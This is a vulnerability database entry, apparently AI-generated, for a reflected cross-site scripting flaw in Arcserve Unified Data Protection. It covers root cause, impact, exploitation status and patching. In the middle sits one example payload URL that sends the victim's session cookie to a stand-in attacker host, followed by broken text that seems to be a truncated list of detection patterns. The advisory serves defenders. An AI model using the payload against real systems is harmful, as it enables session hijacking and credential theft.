
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-34521 is a reflected cross-site scripting (XSS) vulnerability in the web interface of Arcserve Unified Data Protection (UDP). Unsanitized user input is improperly reflected in HTTP responses, enabling remote attackers with low privileges to craft malicious links that execute arbitrary JavaScript in a victim's browser. The vulnerability was published on August 27, 2025, and affects all UDP versions prior to 10.2, including versions 7.x and all 8.0–10.1 releases. It carries a CVSS v3.1 base score of 5.4 (Medium) (Feedly, Arcserve Advisory).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The vulnerability arises because user-supplied input is reflected directly into HTTP responses without adequate sanitization or output encoding in the UDP web interface. An attacker with low-level authenticated access can craft a malicious URL containing a JavaScript payload; when a victim with an active session clicks the link, the payload executes in their browser within the application's security context. Exploitation requires user interaction (the victim must visit the crafted link) and the attack vector is network-based (Feedly, Arcserve Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser within the context of the Arcserve UDP web application. Primary impacts include session hijacking (stealing session cookies), credential theft, client-side code execution, and potential data exfiltration or manipulation. Availability is not directly impacted, but confidentiality and integrity are both at low risk per the CVSS assessment; the scope is changed, meaning the impact can extend beyond the vulnerable component to the victim's browser environment (Feedly).
As of the time of reporting, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation (Feedly). The EPSS score is approximately 0.229%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported.
https://<udp-host>/vulnerable-endpoint?param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.%3Cscript%3E, javascript:, onerror=).Arcserve has released UDP version 10.2, which includes the necessary patches and requires no further action after upgrade. For supported versions 8.0 through 10.1, administrators should apply the vendor-provided patches or upgrade to version 10.2. Versions 7.x and earlier are out of support and must be upgraded to 10.2 to remediate the issue. As interim mitigations, organizations should implement a Content Security Policy (CSP) on the UDP web interface, enforce input validation and output encoding, and educate users to avoid clicking unsolicited links to the UDP portal (Arcserve Advisory).
Coverage of CVE-2025-34521 has been limited to vulnerability aggregation platforms and automated security feeds, with no notable researcher commentary or significant social media discussion identified at this time. Red Hat published a security advisory tracking the CVE, and it was summarized in a CISA weekly vulnerability digest for the week of August 25, 2025 (Red Hat Advisory, RedPacket Security).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."